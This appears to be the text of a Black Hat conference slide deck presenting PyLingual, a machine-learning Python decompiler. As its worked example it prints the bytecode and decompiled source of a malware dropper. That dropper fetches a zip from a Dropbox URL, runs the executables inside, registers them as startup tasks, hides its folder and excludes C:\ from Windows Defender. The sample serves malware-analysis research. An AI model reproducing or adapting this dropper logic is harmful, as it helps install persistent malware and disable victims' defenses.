Pylingual: A Python Decompilation Framework For Evolving Python Versions
Pylingual: A Python Decompilation Framework For Evolving Python Versions
#BHUSA @BlackHatEvents
Hello!
AWS Logo PNG Transparent Images - PNG All
Kangkook Jee
Jessica Ouyang
Source: PYPL
#BHUSA @BlackHatEvents
People Use It to Make Malware
#BHUSA @BlackHatEvents
6 LOAD_GLOBAL 1 (getpass)
8 LOAD_METHOD 2 (getuser)
10 CALL_METHOD 0 (0 positional arguments)
12 STORE_FAST 0 (username)
14 LOAD_GLOBAL 3 (os)
16 LOAD_ATTR 4 (path)
18 LOAD_METHOD 5 (join)
20 LOAD_GLOBAL 6 (tempfile)
22 LOAD_METHOD 7 (gettempdir)
24 CALL_METHOD 0 (0 positional arguments)
26 LOAD_CONST 1 ('yh')
28 CALL_METHOD 2 (2 positional arguments)
30 STORE_FAST 1 (temp_dir)
32 LOAD_GLOBAL 3 (os)
34 LOAD_ATTR 4 (path)
36 LOAD_METHOD 8 (exists)
Here’s One
38 LOAD_FAST 1 (temp_dir)
40 CALL_METHOD 1 (1 positional argument)
42 POP_JUMP_IF_TRUE 27 (to 54)
44 LOAD_GLOBAL 3 (os)
46 LOAD_METHOD 9 (makedirs)
48 LOAD_FAST 1 (temp_dir)
50 CALL_METHOD 1 (1 positional argument)
52 POP_TOP
54 LOAD_CONST 2 ('https://www.dropbox.com/s/a18glsr0gxo16zd/yh.zip?dl=1')
56 STORE_FAST 2 (zip_url)
58 LOAD_GLOBAL 3 (os)
60 LOAD_ATTR 4 (path)
62 LOAD_METHOD 5 (join)
64 LOAD_FAST 1 (temp_dir)
66 LOAD_CONST 3 ('yh.zip')
68 CALL_METHOD 2 (2 positional arguments)
main
70 STORE_FAST 3 (zip_file)
72 LOAD_GLOBAL 3 (os)
74 LOAD_ATTR 4 (path)
76 LOAD_METHOD 5 (join)
78 LOAD_FAST 1 (temp_dir)
80 LOAD_CONST 4 ('download')
82 CALL_METHOD 2 (2 positional arguments)
84 STORE_FAST 4 (download_dir)
86 LOAD_GLOBAL 3 (os)
88 LOAD_ATTR 4 (path)
90 LOAD_METHOD 8 (exists)
92 LOAD_FAST 4 (download_dir)
94 CALL_METHOD 1 (1 positional argument)
96 POP_JUMP_IF_TRUE 54 (to 108)
98 LOAD_GLOBAL 3 (os)
100 LOAD_METHOD 9 (makedirs)
102 LOAD_FAST 4 (download_dir)
104 CALL_METHOD 1 (1 positional argument)
106 POP_TOP
108 SETUP_FINALLY 19 (to 148)
110 LOAD_CONST 5 (0)
112 LOAD_CONST 0 (None)
114 IMPORT_NAME 10 (urllib.request)
116 STORE_FAST 5 (urllib)
118 LOAD_FAST 5 (urllib)
120 LOAD_ATTR 11 (request)
122 LOAD_METHOD 12 (urlretrieve)
124 LOAD_FAST 2 (zip_url)
126 LOAD_FAST 3 (zip_file)
128 CALL_METHOD 2 (2 positional arguments)
130 POP_TOP
132 LOAD_GLOBAL 13 (extract_zip)
134 LOAD_FAST 3 (zip_file)
136 LOAD_FAST 4 (download_dir)
138 LOAD_CONST 6 ('989')
140 CALL_FUNCTION 3 (3 positional arguments)
142 POP_TOP
144 POP_BLOCK
146 JUMP_FORWARD 26 (to 200)
148 DUP_TOP
150 LOAD_GLOBAL 14 (Exception)
152 JUMP_IF_NOT_EXC_MATCH 99 (to 198)
154 POP_TOP
156 STORE_FAST 6 (e)
158 POP_TOP
160 SETUP_FINALLY 14 (to 190)
176 POP_BLOCK
178 POP_EXCEPT
180 LOAD_CONST 0 (None)
182 STORE_FAST 6 (e)
184 DELETE_FAST 6 (e)
186 LOAD_CONST 0 (None)
188 RETURN_VALUE
190 LOAD_CONST 0 (None)
disable_task_manager()
username = getpass.getuser()
temp_dir = os.path.join(tempfile.gettempdir(), 'yh')
if not os.path.exists(temp_dir):
    os.makedirs(temp_dir)
zip_url = 'https://www.dropbox.com/s/a18glsr0gxo16zd/yh.zip?dl=1'
zip_file = os.path.join(temp_dir, 'yh.zip')
download_dir = os.path.join(temp_dir, 'download')
if not os.path.exists(download_dir):
    os.makedirs(download_dir)
try:
    import urllib.request
    urllib.request.urlretrieve(zip_url, zip_file)
    extract_zip(zip_file, download_dir, '989')
except Exception as e:
    print(f'Error downloading/extracting zip: {e}')
    return None
else:
    exe_files = [('path.exe', 'manual'), ('com surrogate.exe', 'registry'), ('steam.exe', 'winservice')]
    v2v2_dir = os.path.join('C:\\Users', username, 'AppData', 'Local', 'v2v2')
    if not os.path.exists(v2v2_dir):
        os.makedirs(v2v2_dir)
    for exe_file, task_name in exe_files:
        shutil.move(os.path.join(download_dir, exe_file), os.path.join(v2v2_dir, exe_file))
        subprocess.Popen(os.path.join(v2v2_dir, exe_file))
        create_startup_task(os.path.join(v2v2_dir, exe_file), task_name)
    hide_folder(v2v2_dir)
    hide_task_scheduler_shortcut()
    exclude_from_windows_defender('C:\\')
    enable_task_manager()
#BHUSA @BlackHatEvents
Code Object Hierarchy
<module>
extract_zip disable_task_manager
is_admin enable_task_manager
hide_folder exclude_from_windows_defender
create_startup_task hide_task_scheduler_shortcut
main
#BHUSA @BlackHatEvents
Code Object Hierarchy
extract_zip
#BHUSA @BlackHatEvents
Translating Bytecode
0 LOAD_GLOBAL 0 (zipfile)
2 LOAD_METHOD 1 (ZipFile)
4 LOAD_FAST 0 (zip_file)
6 LOAD_CONST 1 ('r')
8 CALL_METHOD 2 (2 positional arguments)
10 SETUP_WITH 19 (to 50)
12 STORE_FAST 3 (zip_ref)
...
#BHUSA @BlackHatEvents
Translating Bytecode
0 LOAD_GLOBAL 0 (zipfile)
zipfile.ZipFile
2 LOAD_METHOD 1 (ZipFile)
4 LOAD_FAST 0 (zip_file)
6 LOAD_CONST 1 ('r')
8 CALL_METHOD 2 (2 positional arguments)
10 SETUP_WITH 19 (to 50)
12 STORE_FAST 3 (zip_ref)
...
#BHUSA @BlackHatEvents
Translating Bytecode
0 LOAD_GLOBAL 0 (zipfile)
zipfile.ZipFile
2 LOAD_METHOD 1 (ZipFile)
4 LOAD_FAST 0 (zip_file)
6 LOAD_CONST 1 ('r') <stack_expr>(zip_file, ‘r’)
8 CALL_METHOD 2 (2 positional arguments)
10 SETUP_WITH 19 (to 50)
12 STORE_FAST 3 (zip_ref)
...
#BHUSA @BlackHatEvents
Translating Bytecode
0 LOAD_GLOBAL 0 (zipfile)
2 LOAD_METHOD 1 (ZipFile)
4 LOAD_FAST 0 (zip_file) zipfile.ZipFile(zip_file, ‘r’)
6 LOAD_CONST 1 ('r')
8 CALL_METHOD 2 (2 positional arguments)
10 SETUP_WITH 19 (to 50)
12 STORE_FAST 3 (zip_ref)
...
#BHUSA @BlackHatEvents
Translating Bytecode
0 LOAD_GLOBAL 0 (zipfile)
2 LOAD_METHOD 1 (ZipFile)
4 LOAD_FAST 0 (zip_file) zipfile.ZipFile(zip_file, ‘r’)
6 LOAD_CONST 1 ('r')
8 CALL_METHOD 2 (2 positional arguments)
10 SETUP_WITH 19 (to 50)
with <stack_expr> as zip_ref:
12 STORE_FAST 3 (zip_ref)
...
#BHUSA @BlackHatEvents
Translating Bytecode
0 LOAD_GLOBAL 0 (zipfile)
2 LOAD_METHOD 1 (ZipFile)
4 LOAD_FAST 0 (zip_file) with zipfile.ZipFile(
6 LOAD_CONST 1 ('r') zip_file, ‘r’
8 CALL_METHOD 2 (2 positional arguments) ) as zip_ref:
10 SETUP_WITH 19 (to 50)
12 STORE_FAST 3 (zip_ref)
...
#BHUSA @BlackHatEvents
Translating Bytecode
14 LOAD_FAST 3 (zip_ref)
zip_ref.extractall
16 LOAD_ATTR 2 (extractall)
18 LOAD_FAST 1 (extract_to)
20 LOAD_FAST 2 (password)
22 LOAD_METHOD 3 (encode)
24 LOAD_CONST 2 ('utf-8')
26 CALL_METHOD 1 (1 positional argument)
28 LOAD_CONST 3 (('path', 'pwd'))
30 CALL_FUNCTION_KW 2 (2 total positional and keyword args)
32 POP_TOP
34 POP_BLOCK
#BHUSA @BlackHatEvents
Translating Bytecode
14 LOAD_FAST 3 (zip_ref)
zip_ref.extractall
16 LOAD_ATTR 2 (extractall)
18 LOAD_FAST 1 (extract_to) extract_to
20 LOAD_FAST 2 (password)
22 LOAD_METHOD 3 (encode)
24 LOAD_CONST 2 ('utf-8')
26 CALL_METHOD 1 (1 positional argument)
28 LOAD_CONST 3 (('path', 'pwd'))
30 CALL_FUNCTION_KW 2 (2 total positional and keyword args)
32 POP_TOP
34 POP_BLOCK
#BHUSA @BlackHatEvents
Translating Bytecode
14 LOAD_FAST 3 (zip_ref)
zip_ref.extractall
16 LOAD_ATTR 2 (extractall)
18 LOAD_FAST 1 (extract_to) extract_to
20 LOAD_FAST 2 (password)
22 LOAD_METHOD 3 (encode)
password.encode(‘utf-8’)
24 LOAD_CONST 2 ('utf-8')
26 CALL_METHOD 1 (1 positional argument)
28 LOAD_CONST 3 (('path', 'pwd'))
30 CALL_FUNCTION_KW 2 (2 total positional and keyword args)
32 POP_TOP
34 POP_BLOCK
#BHUSA @BlackHatEvents
Translating Bytecode
14 LOAD_FAST 3 (zip_ref)
16 LOAD_ATTR 2 (extractall) zip_ref.extractall(
18 LOAD_FAST 1 (extract_to) path=extract_to,
20 LOAD_FAST 2 (password) pwd=password.encode(‘utf-8’)
22 LOAD_METHOD 3 (encode) )
24 LOAD_CONST 2 ('utf-8')
26 CALL_METHOD 1 (1 positional argument)
28 LOAD_CONST 3 (('path', 'pwd'))
30 CALL_FUNCTION_KW 2 (2 total positional and keyword args)
32 POP_TOP
34 POP_BLOCK
#BHUSA @BlackHatEvents
Translating Bytecode
36 LOAD_CONST 0 (None)
38 DUP_TOP
40 DUP_TOP
42 CALL_FUNCTION 3 (3 positional arguments)
44 POP_TOP
46 LOAD_CONST 0 (None)
48 RETURN_VALUE
50 WITH_EXCEPT_START This is all implicit!
52 POP_JUMP_IF_TRUE 28 (to 56)
54 RERAISE 1
56 POP_TOP
58 POP_TOP
60 POP_TOP
62 POP_EXCEPT
64 POP_TOP
66 LOAD_CONST 0 (None)
68 RETURN_VALUE
#BHUSA @BlackHatEvents
Translating Bytecode
#BHUSA @BlackHatEvents
The Rest of The Example
<module>
extract_zip disable_task_manager
is_admin enable_task_manager
hide_folder exclude_from_windows_defender
create_startup_task hide_task_scheduler_shortcut
main
#BHUSA @BlackHatEvents
Let’s Use a Decompiler
#BHUSA @BlackHatEvents
Let’s Use a Decompiler
#BHUSA @BlackHatEvents
Let’s Use a Decompiler
#BHUSA @BlackHatEvents
Let’s Use a Decompiler
#BHUSA @BlackHatEvents
What’s The Problem?
#BHUSA @BlackHatEvents
New Python Every Year
#BHUSA @BlackHatEvents
Can AI Save Us?
#BHUSA @BlackHatEvents
Not Quite
#BHUSA @BlackHatEvents
Let’s Work With This
#BHUSA @BlackHatEvents
All-Terrain Decompiler
#BHUSA @BlackHatEvents
PyLingual
Bytecode Segmentation
Statement Translation
#BHUSA @BlackHatEvents
Bytecode Segmentation
0 LOAD_GLOBAL (print)
2 LOAD_CONST (‘Hello’) print(‘Hello’)
4 CALL_FUNCTION 1
6 POP_TOP
8 LOAD_CONST (3) a = 3
10 STORE_FAST (a)
12 LOAD_FAST (a)
14 RETURN_VALUE
return a
#BHUSA @BlackHatEvents
Bytecode Segmentation
0 LOAD_GLOBAL (print)
2 LOAD_CONST (‘Hello’)
4 CALL_FUNCTION 1
6 POP_TOP print(‘Hello’)
8 LOAD_CONST (3) a = 3
10 STORE_FAST (a)
return a
12 LOAD_FAST (a)
14 RETURN_VALUE
#BHUSA @BlackHatEvents
Statement Mapping
#BHUSA @BlackHatEvents
Lines Are Not Statements
print(‘Hello’); a = 3; return a
print(
‘Hello’
)
#BHUSA @BlackHatEvents
But Statements Can Be Lines
print(
‘Hello’
)
a = 3;return a
ast.parse()
ast.unparse()
print(‘Hello’)
a = 3
return a
#BHUSA @BlackHatEvents
Segmentation Model
0 LOAD_GLOBAL (print)
2 LOAD_CONST (‘Hello’)
4 CALL_FUNCTION 1
6 POP_TOP
8 LOAD_CONST (3)
10 STORE_FAST (a)
12 LOAD_FAST (a)
14 RETURN_VALUE
BERT Language Model (~110M)
0 LOAD_GLOBAL (print)
2 LOAD_CONST (‘Hello’)
4 CALL_FUNCTION 1
6 POP_TOP

8 LOAD_CONST (3)
10 STORE_FAST (a)

12 LOAD_FAST (a)
14 RETURN_VALUE
#BHUSA @BlackHatEvents
PyLingual
Bytecode Segmentation
Statement Translation
#BHUSA @BlackHatEvents
Translation Out of The Box
#BHUSA @BlackHatEvents
Simple Translation
#BHUSA @BlackHatEvents
Reordering and Copying
#BHUSA @BlackHatEvents
Implied Semantics
#BHUSA @BlackHatEvents
Translation Model
0 LOAD_GLOBAL 0 (zipfile)
2 LOAD_METHOD 1 (ZipFile)
4 LOAD_FAST 0 (zip_file)
6 LOAD_CONST 1 ('r')
8 CALL_METHOD 2
10 SETUP_WITH 19 (to 50)
12 STORE_FAST 3 (zip_ref)
14 LOAD_FAST 3 (zip_ref)
…
T5 Language Model (~223M)
with zipfile.ZipFile(zip_file, ‘r’) as zip_ref:
#BHUSA @BlackHatEvents
Tricks
• Bytecode Normalization
• Top-K Segmentation
See white paper for details!
#BHUSA @BlackHatEvents
PyLingual
Bytecode Segmentation
Statement Translation
#BHUSA @BlackHatEvents
We Have Statements, Now What?
zip_ref.extractall(path=extract_to, pwd=password.encode(‘utf-8’))
#BHUSA @BlackHatEvents
We Have Statements, Now What?
#BHUSA @BlackHatEvents
Control Flow Graph
…
10 SETUP_WITH 19 (to 50)
#BHUSA @BlackHatEvents
Control Flow Graph
…
10 SETUP_WITH 19 (to 50)
…
34 POP_BLOCK
#BHUSA @BlackHatEvents
Control Flow Graph
…
10 SETUP_WITH 19 (to 50)
…
34 POP_BLOCK
…
48 RETURN_VALUE
#BHUSA @BlackHatEvents
Control Flow Graph
…
10 SETUP_WITH 19 (to 50)
…
50 WITH_EXCEPT_START
34 POP_BLOCK
52 POP_JUMP_IF_TRUE 28 (to 56)
…
48 RETURN_VALUE
#BHUSA @BlackHatEvents
Control Flow Graph
…
10 SETUP_WITH 19 (to 50)
…
50 WITH_EXCEPT_START
34 POP_BLOCK
52 POP_JUMP_IF_TRUE 28 (to 56)
… 54 RERAISE 1
48 RETURN_VALUE
#BHUSA @BlackHatEvents
Control Flow Graph
…
10 SETUP_WITH 19 (to 50)
…
50 WITH_EXCEPT_START
34 POP_BLOCK
52 POP_JUMP_IF_TRUE 28 (to 56)
… 54 RERAISE 1 …
48 RETURN_VALUE 68 RETURN_VALUE
#BHUSA @BlackHatEvents
Control Dependence
Who decides if these nodes may execute?
…
10 SETUP_WITH 19 (to 50)
…
50 WITH_EXCEPT_START
34 POP_BLOCK
52 POP_JUMP_IF_TRUE 28 (to 56)
… 54 RERAISE 1 …
48 RETURN_VALUE 68 RETURN_VALUE
#BHUSA @BlackHatEvents
Control Dependence
Who decides if these nodes may execute?
…
10 SETUP_WITH 19 (to 50)
…
50 WITH_EXCEPT_START
34 POP_BLOCK
52 POP_JUMP_IF_TRUE 28 (to 56)
… 54 RERAISE 1 …
48 RETURN_VALUE 68 RETURN_VALUE
#BHUSA @BlackHatEvents
Control Dependence
Who decides if these nodes may execute?
…
10 SETUP_WITH 19 (to 50)
…
50 WITH_EXCEPT_START
34 POP_BLOCK
52 POP_JUMP_IF_TRUE 28 (to 56)
… 54 RERAISE 1 …
48 RETURN_VALUE 68 RETURN_VALUE
#BHUSA @BlackHatEvents
Dress Up Time
START
zip_ref.extractall(path=extract_to, pwd=password.encode(‘utf-8’))
#BHUSA @BlackHatEvents
Indentation Recovery
START
zip_ref.extractall(path=extract_to, pwd=password.encode(‘utf-8’))
#BHUSA @BlackHatEvents
Indentation Recovery
START
zip_ref.extractall(path=extract_to, pwd=password.encode(‘utf-8’))
#BHUSA @BlackHatEvents
All That For This
#BHUSA @BlackHatEvents
PyLingual
Bytecode Segmentation
Statement Translation
#BHUSA @BlackHatEvents
The Rest of The Example
<module>
extract_zip disable_task_manager
is_admin enable_task_manager
hide_folder exclude_from_windows_defender
create_startup_task hide_task_scheduler_shortcut
main
#BHUSA @BlackHatEvents
Demo
#BHUSA @BlackHatEvents
Yay Automation! But…
<module>
extract_zip disable_task_manager
is_admin enable_task_manager
hide_folder exclude_from_windows_defender
create_startup_task hide_task_scheduler_shortcut
main
#BHUSA @BlackHatEvents
Don’t Trust the Process
=
Manual Verification
Equivalence Modulo Inputs
Perfect Decompilation
#BHUSA @BlackHatEvents
Don’t Trust the Process
=
Manual Verification
Equivalence Modulo Inputs
Perfect Decompilation
#BHUSA @BlackHatEvents
Don’t Trust the Process
=
Manual Verification
Equivalence Modulo Inputs
Perfect Decompilation
#BHUSA @BlackHatEvents
Don’t Trust the Process
=
Manual Verification
Equivalence Modulo Inputs
Perfect Decompilation
#BHUSA @BlackHatEvents
Perfect Decompilation
#BHUSA @BlackHatEvents
Evaluation Highlights
Full results in white paper
File-level Perfect Decompilation rates on 3,000 random PyPI files
#BHUSA @BlackHatEvents
Error Localization
#BHUSA @BlackHatEvents
Closing The Loop
#BHUSA @BlackHatEvents
Closing The Loop
#BHUSA @BlackHatEvents
Closing The Loop
#BHUSA @BlackHatEvents
Closing The Loop
#BHUSA @BlackHatEvents
Future Directions
=
GNN Control Flow Reconstruction
LLM Feedback Loop
Broader Language Support
#BHUSA @BlackHatEvents
Future Directions
=
GNN Control Flow Reconstruction
LLM Feedback Loop
Broader Language Support
#BHUSA @BlackHatEvents
Future Directions
=
GNN Control Flow Reconstruction
LLM Feedback Loop
Broader Language Support
#BHUSA @BlackHatEvents
Protecting Your Python
#BHUSA @BlackHatEvents
Key Takeaways
3.5- 3.6+ =
Uncompyle6 PyLingual Perfect Decompilation Bytecode Obfuscation
#BHUSA @BlackHatEvents